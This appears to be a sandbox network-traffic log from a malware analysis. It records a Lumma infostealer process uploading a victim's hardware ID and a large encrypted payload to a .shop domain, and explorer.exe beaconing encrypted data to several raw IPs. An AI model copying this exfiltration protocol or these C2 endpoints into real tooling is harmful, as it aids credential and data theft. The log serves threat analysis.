2024-07-27 06:54:59 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:59 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:59 UTC	685	IN	Data Raw: 48 54 39 75 65 6d 68 78 46 4d 67 53 56 39 71 2f 6e 65 6e 58 6e 6a 7a 56 6d 46 39 2b 68 53 35 49 74 72 30 34 4d 35 65 57 39 34 4c 50 32 4b 4a 73 64 41 48 79 6e 6a 59 58 49 4d 44 72 76 6d 59 5a 5a 72 49 78 4f 63 42 6d 54 32 75 70 68 72 41 33 72 68 67 6d 2b 72 39 7a 75 45 61 31 47 5a 75 6b 59 6b 59 4b 36 35 44 74 33 6f 6e 5a 79 70 44 49 54 61 4a 39 70 77 51 77 52 49 38 4c 30 6c 62 34 43 39 50 4d 39 79 46 4f 45 45 4c 30 72 73 56 54 4c 70 6d 45 4f 41 4c 7a 36 6d 63 4c 58 6e 72 70 36 43 4e 7a 74 2b 46 52 45 50 59 76 43 34 48 63 30 53 46 49 67 51 45 44 36 56 51 7a 34 74 61 6a 30 4a 54 6c 70 5a 48 69 4c 35 65 4b 43 42 49 38 37 45 6b 70 33 4b 31 52 6c 51 4b 36 5a 59 6d 31 68 76 45 39 6b 37 51 6e 37 54 75 4b 6b 74 42 37 73 4d 6a 50 4d 5a 45 48 4f 62 61 50 63 4f 31 Data Ascii: HT9uemhxFMgSV9q/nenXnjzVmF9+hS5Itr04M5eW94LP2KJsdAHynjYXIMDrvmYZZrIxOcBmT2uphrA3rhgm+r9zuEa1GZukYkYK65Dt3onZypDITaJ9pwQwRI8L0lb4C9PM9yFOEEL0rsVTLpmEOALz6mcLXnrp6CNzt+FREPYvC4Hc0SFIgQED6VQz4taj0JTlpZHiL5eKCBI87Ekp3K1RlQK6ZYm1hvE9k7Qn7TuKktB7sMjPMZEHObaPcO1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50752	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:00 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:00 UTC	1122	OUT	Data Raw: 6f 70 47 73 6c 44 57 73 55 71 4d 4a 4e 7a 6a 6a 41 38 77 68 4e 43 33 70 61 39 47 78 67 67 54 2b 4a 32 43 56 68 42 6e 75 4c 73 67 62 4a 6f 77 49 38 58 6b 45 6c 4d 43 30 64 44 62 58 52 32 43 72 6b 32 52 45 62 58 6a 31 39 31 34 66 65 51 6d 50 76 6c 46 52 4a 4c 35 64 79 53 71 73 6c 5a 54 4b 39 52 71 78 79 48 36 64 68 2f 69 56 31 42 39 44 6f 4b 36 44 38 37 58 73 45 49 38 6f 4f 4f 61 57 44 2f 56 4d 33 6f 6b 73 36 6d 6d 30 6f 31 49 5a 70 70 6a 4a 64 38 4d 45 2b 50 71 76 47 73 46 7a 61 65 6d 4c 35 70 53 5a 73 33 4c 79 64 4e 46 56 52 63 70 45 78 31 74 54 73 44 52 4b 43 4e 77 33 64 68 6f 5a 4d 67 64 71 57 7a 51 70 43 59 6f 45 58 2f 6f 4c 56 7a 68 32 4c 2f 67 78 73 65 5a 35 74 4c 46 56 4f 77 50 61 2f 41 52 63 47 35 42 35 4c 4a 4f 72 2f 79 2f 75 4b 34 54 6a 62 75 6d Data Ascii: opGslDWsUqMJNzjjA8whNC3pa9GxggT+J2CVhBnuLsgbJowI8XkElMC0dDbXR2Crk2REbXj1914feQmPvlFRJL5dySqslZTK9RqxyH6dh/iV1B9DoK6D87XsEI8oOOaWD/VM3oks6mm0o1IZppjJd8ME+PqvGsFzaemL5pSZs3LydNFVRcpEx1tTsDRKCNw3dhoZMgdqWzQpCYoEX/oLVzh2L/gxseZ5tLFVOwPa/ARcG5B5LJOr/y/uK4Tjbum
2024-07-27 06:55:01 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:01 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:01 UTC	685	IN	Data Raw: 58 56 55 2b 79 6e 7a 79 50 52 34 50 33 39 53 58 56 39 57 35 48 42 44 52 42 33 41 45 46 32 7a 4e 4b 6e 4f 4e 45 6a 4d 51 36 34 6e 4b 48 5a 4c 36 34 42 43 4d 7a 39 55 65 47 33 57 37 61 57 64 67 7a 77 51 47 54 56 34 69 68 61 4f 57 45 48 6e 76 4b 7a 70 74 55 39 45 33 4f 71 6d 4f 49 6a 4d 34 54 68 6e 6c 63 68 64 39 42 42 75 59 78 6c 74 56 55 57 67 6a 51 59 46 30 61 2b 35 55 30 30 49 62 70 65 65 4b 66 63 71 4d 46 4c 64 4d 72 55 64 2f 71 57 62 43 67 46 31 76 49 36 71 39 76 30 54 70 63 4a 35 42 72 64 41 54 49 79 34 39 72 33 43 44 74 53 4c 69 76 2f 73 2f 36 34 79 33 43 65 78 4c 6e 2b 67 44 79 2f 56 34 7a 30 77 48 66 54 77 39 74 6f 4b 53 45 42 48 30 69 33 57 71 6b 62 5a 71 71 31 33 7a 33 33 73 71 52 6c 67 6a 59 31 44 58 58 34 4c 33 70 42 7a 48 58 50 46 31 71 55 53 Data Ascii: XVU+ynzyPR4P39SXV9W5HBDRB3AEF2zNKnONEjMQ64nKHZL64BCMz9UeG3W7aWdgzwQGTV4ihaOWEHnvKzptU9E3OqmOIjM4Thnlchd9BBuYxltVUWgjQYF0a+5U00IbpeeKfcqMFLdMrUd/qWbCgF1vI6q9v0TpcJ5BrdATIy49r3CDtSLiv/s/64y3CexLn+gDy/V4z0wHfTw9toKSEBH0i3WqkbZqq13z33sqRlgjY1DXX4L3pBzHXPF1qUS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50754	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:02 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:02 UTC	1122	OUT	Data Raw: 45 64 57 2f 54 48 67 63 76 4e 48 47 70 56 52 39 77 31 49 32 7a 41 7a 63 34 7a 2f 44 72 7a 64 53 42 53 4d 72 59 68 50 6f 2f 61 4f 58 34 6d 64 58 69 47 5a 30 34 32 6f 74 32 55 6d 7a 36 79 65 34 69 59 61 63 44 34 64 79 37 48 4f 65 39 42 32 74 33 51 6d 68 51 6e 39 79 56 52 64 48 39 77 77 5a 57 47 6f 31 56 6a 4e 37 5a 73 4b 56 70 65 58 74 31 49 35 6a 6c 59 4a 57 65 47 62 36 46 55 71 79 76 6a 4e 55 66 52 50 35 69 2f 2b 2b 7a 58 56 49 55 64 6f 31 64 4d 67 53 59 32 4b 72 39 67 4d 2b 2f 65 33 34 73 53 56 72 63 50 65 37 70 6f 2f 4b 73 63 46 45 79 51 4c 63 50 51 43 55 77 4d 48 6e 4c 2b 4b 37 4b 4f 41 51 57 42 77 4b 51 2b 65 49 62 71 66 6e 49 39 66 45 4b 59 78 54 64 6d 49 4a 53 50 69 54 4d 46 35 2f 7a 48 4e 52 4d 35 4f 47 35 6e 69 4c 48 68 63 61 43 34 4e 69 48 68 4c Data Ascii: EdW/THgcvNHGpVR9w1I2zAzc4z/DrzdSBSMrYhPo/aOX4mdXiGZ042ot2Umz6ye4iYacD4dy7HOe9B2t3QmhQn9yVRdH9wwZWGo1VjN7ZsKVpeXt1I5jlYJWeGb6FUqyvjNUfRP5i/++zXVIUdo1dMgSY2Kr9gM+/e34sSVrcPe7po/KscFEyQLcPQCUwMHnL+K7KOAQWBwKQ+eIbqfnI9fEKYxTdmIJSPiTMF5/zHNRM5OG5niLHhcaC4NiHhL
2024-07-27 06:55:03 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:03 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:03 UTC	685	IN	Data Raw: 68 6e 65 6e 69 4f 65 38 38 68 43 31 63 52 4d 74 67 7a 69 36 70 6a 4a 32 6e 59 61 39 47 64 63 37 51 4f 6c 71 2f 39 53 43 52 63 51 2f 6f 56 4d 44 66 68 61 49 6b 33 33 6f 74 51 44 79 73 63 52 67 71 46 44 62 39 61 73 38 78 52 35 58 6c 61 35 4d 4f 50 65 44 4a 4c 75 50 73 57 4c 77 4c 35 32 44 52 4f 35 6d 6d 4c 6c 68 43 65 58 56 47 2f 58 35 2f 51 6c 73 46 47 45 63 57 72 41 6f 54 69 51 70 57 6a 7a 59 5a 77 77 47 49 6f 46 73 4b 77 50 78 48 56 70 36 45 48 34 43 77 75 36 33 6b 51 30 46 56 6c 70 61 35 74 48 49 75 34 34 2b 73 4c 35 47 6f 4d 4d 51 71 67 35 52 48 4f 6b 43 37 35 44 4b 50 61 31 66 64 43 43 36 4e 32 30 4a 35 65 4b 33 58 57 50 5a 49 77 57 62 71 38 75 6a 6e 63 44 38 34 2b 7a 71 5a 71 78 34 63 54 52 6a 54 6f 31 69 49 6c 7a 6d 32 6f 76 58 67 42 7a 63 56 44 49 Data Ascii: hneniOe88hC1cRMtgzi6pjJ2nYa9Gdc7QOlq/9SCRcQ/oVMDfhaIk33otQDyscRgqFDb9as8xR5Xla5MOPeDJLuPsWLwL52DRO5mmLlhCeXVG/X5/QlsFGEcWrAoTiQpWjzYZwwGIoFsKwPxHVp6EH4Cwu63kQ0FVlpa5tHIu44+sL5GoMMQqg5RHOkC75DKPa1fdCC6N20J5eK3XWPZIwWbq8ujncD84+zqZqx4cTRjTo1iIlzm2ovXgBzcVDI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50755	172.67.213.85	443	4936	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:02 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 552479 Host: liernessfornicsa.shop
2024-07-27 06:55:02 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 35 43 41 30 30 39 41 46 44 46 43 31 33 39 41 45 38 30 33 33 32 43 30 39 34 39 36 38 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8DA5CA009AFDFC139AE80332C094968D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-27 06:55:02 UTC	15331	OUT	Data Raw: 15 7d 04 62 29 2b 81 bf 84 39 a5 07 70 c6 5d 80 b5 7c 0a 78 30 5d 60 86 0e 8b 2d eb 9a 51 5b ad 0b b1 1e ba 87 e9 00 56 76 c8 1c c2 d1 8c 54 a1 c9 ff df 4e 4a 2f 2c 48 5c 95 85 07 00 bc 8f d0 b4 a2 04 14 fa 80 16 d4 a2 32 a3 6d 43 64 13 78 48 4a a8 cc 74 59 fc d6 e8 47 e8 e1 17 ee 12 92 db 03 ec 71 e8 c7 10 75 7a b1 d0 b3 15 b0 4a d0 24 4d 0f e0 7b a1 48 48 0f 8e c2 12 3d 46 aa 75 71 b9 3e d5 a9 da 05 27 7f e0 fb 23 e4 d0 6d f1 14 d6 7c df f8 bd d3 bc b4 8f a4 b0 06 f1 9c 6e 0f f4 0b 79 9b d1 32 29 30 d5 42 a9 ec 7a 40 7b 70 87 b9 99 5d c8 e7 f8 e4 8e 86 f7 4c 47 90 9e 55 8d b2 43 55 3d fa 95 9a 51 04 8c 4c 11 22 ba 4c 2d c2 02 94 32 db 30 b9 97 c9 d6 10 d9 29 04 84 f3 87 1b 93 7e 89 bb 78 e3 cf 82 26 0e 9d be 74 a9 90 5f 22 76 de b3 fd d7 b0 93 d4 fe b1 Data Ascii: }b)+9p]\|x0]`-Q[VvTNJ/,H\2mCdxHJtYGquzJ$M{HH=Fuq>'#m\|ny2)0Bz@{p]LGUCU=QL"L-20)~x&t_"v
2024-07-27 06:55:02 UTC	15331	OUT	Data Raw: 6d 62 95 d5 17 cb ac 10 fa 26 34 2b 3e b1 e2 ee 07 4d fe d9 15 a8 01 04 d8 26 f5 6e 9f f0 e9 0c 75 0e 0b 09 4e 65 44 5e 1c 4c 5a 70 b1 80 83 4f 68 11 7c 13 e6 ad 55 2a 13 b6 31 43 49 66 59 16 71 06 68 22 8a f3 b8 e8 db df 0a ab 35 92 1e 2a 4c e3 71 a5 fa 9b 93 a8 fa d2 b2 4d fd b9 a4 3c 8a b7 e0 4e f5 a2 84 2a c3 ad 44 36 bd d5 9c e8 8d cb 2b c5 4a 77 dd 0f eb 28 cd 5e e2 d3 33 4e e5 20 91 15 0e 23 c9 3d 79 97 bf 53 be bd 45 11 81 73 fe 73 3f 7e 84 4d 21 79 7c e6 ec 87 3f a7 09 4c ca 75 2e 26 a1 88 2d cf aa 7b d7 9b 65 91 f7 d4 71 9d 68 11 fa 7d ad f1 94 18 aa f6 88 43 5b b3 4a 7d e8 2e f6 48 ba eb 2a 69 b4 01 35 76 01 58 c7 53 09 33 84 65 99 5f ef 89 27 5d 9d 66 94 86 95 9f d8 51 73 e0 a4 a1 78 d6 3d 5f 9a 06 aa c6 24 26 e0 92 df 26 61 ec 42 41 bb 2e e8 Data Ascii: mb&4+>M&nuNeD^LZpOh\|U1CIfYqh"5LqM<ND6+Jw(^3N #=ySEss?~M!y\|?Lu.&-{eqh}C[J}.Hi5vXS3e_']fQsx=_$&&aBA.
2024-07-27 06:55:02 UTC	15331	OUT	Data Raw: 73 4c 42 54 1c 82 9c ba e6 f6 8a 3a af 5f b2 86 f9 a0 60 e9 5a a9 0e 5a 25 43 37 0c e5 e5 ce 18 75 97 b6 b8 95 7a 6b a3 e8 85 4f f3 02 9c 47 71 9e d0 95 c0 e4 fb db 47 16 8b bb 3a 97 5c 10 36 f6 d1 41 fc e4 96 3f 82 95 90 32 98 2a b6 e3 0f f7 e8 00 32 ad 7b ab 11 a1 93 1a a6 b8 57 35 65 5b c9 5d 16 e3 72 43 bb b7 4a 3c 2e fe b8 30 a4 fc 75 1f 48 a8 3e e0 cc 7e ef d3 e9 f8 9c 7f 53 e0 a4 d8 9f 8c 2d eb 37 c5 b3 e1 6d ff 34 bf 1f 09 b1 58 82 35 c9 14 87 3c c5 51 c5 15 ea 2b d9 e1 3f 3d 94 a9 d0 55 66 0c 6f 6d 2b e9 e9 88 f8 69 42 43 7b 6d 75 91 0d bb f8 68 da e1 18 b7 83 7b 2c e5 ac 86 8f ee 04 fd b9 ec 78 6c fb 0a 3f 51 03 8d 33 bc 33 ff e6 46 de 46 d0 56 b9 b8 fe 2c a6 78 3d 2c a9 a3 a8 ed ba a8 58 73 5b 5a 61 71 ee e6 7a a6 dc eb 99 22 83 f1 3d ec 31 db Data Ascii: sLBT:_`ZZ%C7uzkOGqG:\6A?2*2{W5e[]rCJ<.0uH>~S-7m4X5<Q+?=Ufom+iBC{muh{,xl?Q33FFV,x=,Xs[Zaqz"=1
2024-07-27 06:55:02 UTC	15331	OUT	Data Raw: a2 61 0e 1f 7b 3b d9 93 8f 7c 50 ca 00 c1 74 55 c7 b8 38 e6 c8 3f 2b b4 cc 10 08 37 b8 2f 9a bb 69 1b 87 d5 60 9d c1 e4 9c a7 bd c4 78 1d 9a cf 0d 16 c1 0e 6e 38 73 32 93 f8 8d 7f c9 06 a2 29 a4 75 bb 93 54 d3 4f 19 69 ec 16 c9 b0 de 01 37 17 62 fa 9a 80 17 56 90 78 2a e4 37 13 0f 33 3a 0e e7 f0 fc 1d 7d 01 1d 20 ba fd ab 82 5d de 92 4c 6a e2 58 03 b0 93 f9 87 4b 5c 17 93 35 98 99 1c bf c3 0d 79 93 71 e7 c0 85 b8 85 ee 7a eb e4 e7 e4 c1 e9 33 99 a6 60 f6 81 b1 5a 8a 6a 54 84 a7 40 af 31 96 53 1e 81 52 a4 cd 0c 04 9b 30 f2 dc dc 0f 5e 0b 27 bd 91 8b db 99 af 26 0c bb 32 c5 57 f8 4f e2 7c e9 df 91 ad 0c 29 c1 cb 18 4e 00 93 82 ca 04 9d d3 7e b5 18 0b 48 ff bc 84 95 78 b1 9e 1d 85 cb d2 09 9f 97 b8 7a ec 19 1d 23 6a 42 55 45 00 d1 3f 51 d7 d9 03 3a a4 e3 f3 Data Ascii: a{;\|PtU8?+7/i`xn8s2)uTOi7bVx*73:} ]LjXK\5yqz3`ZjT@1SR0^'&2WO\|)N~Hxz#jBUE?Q:
2024-07-27 06:55:02 UTC	15331	OUT	Data Raw: 88 ad f1 e7 e5 30 bb 65 4b ab ad f2 07 69 18 ca 01 0c 98 d0 a7 39 fe 02 8a 6e 6c c5 6a e0 d5 2d 46 11 0e 08 6e d9 2c 87 ae ff e6 5e 08 1e fb 92 95 79 2d f8 48 b3 73 23 b6 35 eb a2 2e 76 e3 b2 7a aa 1f fa 1e 77 90 ca 10 6f 6b 5e d4 ec 95 d3 3b 8f 75 77 f4 fe a5 1c a2 2b 3f 04 75 e3 d8 a9 ac 9b 04 21 30 13 4b 24 69 3f 0b eb fe 9f 96 04 f9 48 b9 67 cd 6c be 5d ef 57 5b ca 39 7e 71 91 fc f6 a3 06 93 0f 1c 64 d3 41 06 1c bc fe 53 b5 ff e3 db 25 4f b1 2a 65 a6 8e f5 b9 1a 69 42 da 3f 24 2d ce 65 81 fe db fb c6 49 4d 91 1f ea f7 a9 24 61 41 b6 b9 cc 59 5e 93 66 e4 37 3f 24 d2 ea 7e 63 56 01 f0 d6 1b af fb a8 4b b8 a1 68 9d 59 ab 61 45 12 7e b4 65 79 91 d2 a4 8d 7c 3c 81 59 11 bb 1e 88 e3 34 52 3c 74 45 58 c6 21 2c 59 d8 75 b4 56 e7 eb ea 2e 6e 4a 23 cb cc 65 fb Data Ascii: 0eKi9nlj-Fn,^y-Hs#5.vzwok^;uw+?u!0K$i?Hgl]W[9~qdAS%O*eiB?$-eIM$aAY^f7?$~cVKhYaE~ey\|<Y4R<tEX!,YuV.nJ#e
2024-07-27 06:55:02 UTC	15331	OUT	Data Raw: 0e 38 9f aa b4 6c 5b 8d c1 f5 3e 35 7d cb 53 41 89 76 66 ff a6 83 1a 3f 96 e0 5c 23 03 5c 47 61 c7 11 36 db 64 40 92 15 f2 37 c7 12 a7 26 f0 18 eb 42 55 0b 00 83 e6 6b 72 d0 c5 57 50 56 e8 ca b1 ac 56 09 a2 07 82 47 13 6c 4b 35 73 8e 69 89 85 2b 48 9f bb b2 b7 a5 c5 0b a6 e7 64 97 c2 0b 12 f0 ad cd 8c 3f b5 09 ad c9 24 4e 2e 3f 36 42 4b 0f 32 39 c7 45 12 42 87 9c 16 cb b9 ce e8 d2 75 11 0b bd 2a b4 bf bf fc 7a 9d 32 4d a2 1f 2a 16 4c c2 2b c3 ba 78 48 7d e7 af 73 2a 8b ef c5 55 4e 1e c5 ef ff 5c 81 71 a2 d0 0c db 15 2c a1 c5 63 57 59 1c 32 5c dd 33 48 33 73 61 aa 1e cf f1 26 87 55 13 9a fe d8 50 3f 7f b8 bd ab ec 40 81 ed 20 0c db 96 e1 ae 32 81 7c 79 a9 cd 8b d1 d6 91 75 97 98 b2 2b 7c 0f d1 39 c4 db 30 c8 7f f4 b5 99 a6 2c 5b a4 4b ae 57 6d 6f e3 f4 cf Data Ascii: 8l[>5}SAvf?\#\Ga6d@7&BUkrWPVVGlK5si+Hd?$N.?6BK29EBuz2ML+xH}s*UN\q,cWY2\3H3sa&UP?@ 2\|yu+\|90,[KWmo
2024-07-27 06:55:02 UTC	15331	OUT	Data Raw: 5e 67 e6 5f e1 78 6c 39 e7 68 8a 7f 08 ec 24 ed ac 07 7e 43 db c7 d0 dc 42 bb 00 3d 09 b2 b9 08 fb 8e a2 97 f3 9c a1 62 be 8f 80 de b3 f3 f6 29 62 a5 e8 01 da f5 54 49 59 77 9a da 22 65 e1 55 8a 07 6b dc 1f 8e 10 cc 23 df 14 97 b7 61 9f 89 c6 58 8b 61 5a af e7 50 75 47 4e 46 b1 5c 60 e4 ba b8 0c 47 88 72 f9 2e 0b 0d 8d 46 00 26 02 31 73 23 94 95 87 06 99 f5 92 e0 20 eb 64 75 d5 1f 2b 1b 9d 14 16 5a be 0b e4 3a 7c 78 7f f5 25 81 75 1c 4e be af 41 11 80 f1 6c 91 27 27 18 76 07 90 ab 65 10 3d 06 4a 84 98 17 45 78 0b e3 c2 86 36 41 b5 fa 20 32 ec fa a2 93 ef c6 a5 44 a7 43 45 30 ba 34 f7 25 9a fb 2a 79 ed 54 42 18 f3 c2 d1 6e 63 26 71 77 3b 9d 64 27 58 83 5e e8 38 9f c6 3f e1 03 db c5 fa fc 3e 41 16 c0 1a 85 2e cb 13 52 ee a8 c0 be 40 04 85 74 e3 3a 75 01 75 Data Ascii: ^g_xl9h$~CB=b)bTIYw"eUk#aXaZPuGNF\`Gr.F&1s# du+Z:\|x%uNAl''ve=JEx6A 2DCE04%*yTBnc&qw;d'X^8?>A.R@t:uu
2024-07-27 06:55:02 UTC	15331	OUT	Data Raw: c2 bd af 9c 7c e1 b6 07 10 31 67 29 4f 91 e6 91 3a f4 23 eb 6d 07 4b 20 a1 fe 42 6f 8e 0a 42 e5 28 f7 8e d5 19 9b 27 0c f2 81 9d f4 69 8b b6 d5 4a 55 d4 bb 87 ac 30 81 85 08 c1 25 a1 b4 95 e3 c4 5d 2b 97 50 e9 8e 12 e3 7c 3c b3 52 93 d3 cd 79 70 8c 5c f9 75 18 cb 87 6b 7c 42 31 a5 f1 03 df d6 b4 56 d8 0b 01 dc 82 67 fe ee 54 f4 5b e6 14 a2 8e 4d 62 56 ab e7 ab f9 cf df cc 88 72 df 28 3a 41 38 b0 8e 4f 09 83 d0 7c 93 89 fc 04 ea d7 87 4d 4a 88 e3 a2 49 14 2c 2e 9e ce 93 76 20 04 30 30 98 9f 07 a2 97 01 1a eb e9 01 1b 3f 36 40 9f da f5 2b f0 93 96 2a 33 82 7e 91 1e da 5d 6b 8c 9b 49 19 a7 ed d3 dd 44 cf fa d4 3b 51 37 be 18 04 b5 18 4c a1 3b 42 6c f6 1f ad d3 79 99 50 f0 ba a3 d6 dc 19 2e 0e d2 a3 6e fd 10 0e f9 f0 7a d8 7a 58 9e c1 b3 45 ef b7 53 a7 aa b1 Data Ascii: \|1g)O:#mK BoB('iJU0%]+P\|<Ryp\uk\|B1VgT[MbVr(:A8O\|MJI,.v 00?6@+*3~]kID;Q7L;BlyP.nzzXES
2024-07-27 06:55:02 UTC	15331	OUT	Data Raw: ff b6 4f 46 96 15 94 d5 7c 93 1b 42 d5 6d 9f c4 02 e2 df 17 7b e1 88 17 8a 45 02 c9 7b bb 34 aa d8 7c db 8a 60 d7 a2 22 3a 86 f3 24 90 1f e5 64 a6 38 69 6f cc 4c 52 a2 a1 39 84 ff 18 c0 f3 ef 77 a1 04 b5 a8 f2 0b 0e 67 0b 1b fc d4 9d ba 29 b1 19 eb bf 07 6f 61 8c ff 48 95 e7 a2 68 dd 64 fb 36 67 8a 91 63 1a b1 50 a4 18 f8 9d a6 91 41 be b2 44 ff 3d 92 74 74 22 b3 8a 25 31 c5 35 e9 3a d6 db 81 be cc 8d a6 e3 10 58 f3 23 f8 0e ee 99 eb f1 97 e7 8d 60 b4 86 26 c0 8d e3 5d c4 68 62 b1 98 ae 64 2f 63 47 61 d8 f7 bf 2d 1e b3 d1 24 fe 23 f2 88 22 33 9b e1 43 18 41 f9 99 55 45 11 3e 9a 06 19 19 a5 c7 79 23 a2 83 54 44 f4 8d cd f3 b6 da dd 6c 99 98 b0 e9 9e 1c f4 bc c8 16 24 a0 32 36 7a af 80 50 f0 e6 36 b6 d3 be 85 d8 25 2e 77 cb cb 90 8b 52 f1 2c 70 72 39 78 58 Data Ascii: OF\|Bm{E{4\|`":$d8ioLR9wg)oaHhd6gcPAD=tt"%15:X#`&]hbd/cGa-$#"3CAUE>y#TDl$26zP6%.wR,pr9xX
2024-07-27 06:55:04 UTC	810	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:55:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=27eddcmrgheufbae15m2msq9ec; expires=Wed, 20-Nov-2024 00:41:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AL9alCr6wb63NX%2FOtgEPPCNkmncZJC681%2FNPNjnsCaQCTE8ScmLqOR41Exg4JNdMvdxW5D11g3UqxLtMnNs5%2FjTs4mkHWkDQ1gMPgATM%2FMLcHXRm%2FJwIn8RYVbhJx5I4jIsWAgJqisU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab8b899c97c7c-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50758	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:04 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:04 UTC	1122	OUT	Data Raw: 43 72 5a 78 38 4a 78 2f 58 6c 62 6c 34 7a 53 55 62 63 57 36 61 4e 6f 30 6c 2f 6e 6c 73 6e 4c 71 72 54 74 58 6c 2b 76 37 56 63 76 50 34 31 64 61 57 6e 78 79 4a 4d 77 42 68 50 6e 52 78 35 52 43 54 34 47 68 39 6d 47 6b 6a 6f 2f 6a 6e 42 53 46 54 70 67 46 68 43 4f 48 4e 39 77 61 6a 2f 69 4f 37 59 4d 36 67 65 52 79 42 56 73 34 32 38 6b 30 2b 62 44 43 54 30 32 6e 79 2f 79 48 50 31 4a 2f 69 55 69 6e 33 78 46 48 2f 76 41 62 6b 2b 62 6c 54 76 78 65 4d 6a 2b 43 35 43 41 49 42 2f 7a 51 79 6a 5a 47 30 49 4a 67 35 49 39 63 61 4a 49 37 45 72 39 61 55 78 41 64 69 63 73 61 69 51 68 6e 62 55 6c 4b 70 2b 37 44 76 51 55 44 6f 64 4c 34 53 76 47 4b 5a 75 33 75 67 2f 61 6a 4d 7a 47 63 66 39 31 52 70 44 32 73 75 7a 44 65 47 42 2b 69 75 50 71 72 47 6a 6a 46 48 47 54 72 61 68 6c Data Ascii: CrZx8Jx/Xlbl4zSUbcW6aNo0l/nlsnLqrTtXl+v7VcvP41daWnxyJMwBhPnRx5RCT4Gh9mGkjo/jnBSFTpgFhCOHN9waj/iO7YM6geRyBVs428k0+bDCT02ny/yHP1J/iUin3xFH/vAbk+blTvxeMj+C5CAIB/zQyjZG0IJg5I9caJI7Er9aUxAdicsaiQhnbUlKp+7DvQUDodL4SvGKZu3ug/ajMzGcf91RpD2suzDeGB+iuPqrGjjFHGTrahl
2024-07-27 06:55:05 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:05 GMT Content-Type: text/plain; charset=utf-8 Connection: close
